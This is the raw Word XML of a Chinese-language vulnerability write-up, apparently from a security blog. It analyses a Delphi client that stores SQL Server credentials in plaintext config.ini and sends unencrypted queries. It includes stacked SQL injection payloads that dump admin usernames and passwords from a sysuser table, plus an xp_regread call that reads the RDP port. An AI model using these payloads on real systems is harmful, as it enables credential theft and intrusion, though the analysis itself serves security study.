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ict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:264.600pt;width:467.400pt;height:249.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7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6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383838"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/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程序的主要function，与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-41"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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procedure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1208" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w: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Delphi把操作数据的方法分成了两种，一种是fu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nction，另一种是procedure，大致理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解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>为“函数”和“过程”。</w:t>
      </w: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Procedure类似C语言中的无返回值</w:t>
      </w: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函数，即VOID。而Function就是c语言中的有返回值函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数，即没有V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oid。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79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程序分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为2种连接数据库模式：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67.400pt;height:325.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8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38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-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>无论是本地模式，还是联网模式，都是读取，当前路径的co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfig.ini配置文件：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（导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>致敏感信息暴漏，可直连服务器）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67.400pt;height:317.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:426.600pt;width:467.400pt;height:125.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10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67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继续跟数据库连接：配合SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-47"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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Server数据库，直接带入，可以判断出为明文存储。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23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-11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>config.i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ni配置如下：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351.600pt;height:460.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11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5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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5755" w:firstLine="0"/>
      </w:pP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基于TCP通信，SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> 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Server通信构架大致如下：</w:t>
      </w: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（可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>导致通信过程中抓取明文执行）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67.400pt;height:443.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12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09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代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>入执行：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-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（导致可拼接sql语句，查询任意语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或者执行命令）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67.400pt;height:270.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:337.800pt;width:467.400pt;height:110.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14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3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部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分语句其中如下：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spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="118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select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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distinct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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memberid,receivecompany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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weigh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="17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where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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receivecompany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="16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not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null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and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receivecompany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like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="2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''%'+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xxxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+'%''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220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软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>件呈现如下：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04.400pt;height:274.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:426.600pt;width:401.400pt;height:154.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:662.400pt;width:467.400pt;height:48.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId17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12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323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2357" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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收货单位编号，以及收货单位名称。分别为：memberid,receivecompany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闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>合语句为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220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2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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loginid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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memberid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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receivecompany</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-21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sysuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-23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--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68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抓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>取返回如图：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得到admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-44"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>账号以及密码。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57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构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>造读取远程桌面端口号：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258.600pt;width:467.400pt;height:162.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18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得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>到远程服务器端口号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spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="2511" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXEC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>master..xp_regread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10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'HKEY_LOCAL_MACHINE','SYSTEM\Cur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rentControlSet\Control\Terminal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Server\WinStations\RDP-Tcp','PortNumber'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>--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4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copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> 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获取缓冲区内容：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（导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>致可从服务器端构造代码）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38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8982" w:firstLine="0"/>
      </w:pP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copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用法如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>copy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（a,b,c);</w:t>
      </w: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a：就是copy源，就是一个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字符串，表示你将要从a里copy一些东西，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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b：从a中的第b位开始c</w:t>
      </w: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opy（包含第11位），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c：copy从第b位开始后的c个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字符，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exp：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-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m:=‘the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-25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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-25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fuck'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101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870" w:right="0" w:firstLine="0"/>
      </w:pP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s：=copy（m,2,2）；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//s值为‘he’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21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当超出范围，会发生异常错误。实例中，从服务器数据库获取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数据后进行copy。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软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>件登陆部分代码如下：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-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（导致可自动化跑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>loginid。）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454.200pt;margin-top:775.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:293.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:402.600pt;width:467.400pt;height:281.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21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87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多次尝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>试错误处理如下：退出软件，并且重新开始计算。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85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5" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>opoor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0" w:lineRule="exact"/>
        <w:ind w:left="2000" w:right="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="PageMark10"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11920" w:h="1684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seFELayout/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 
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
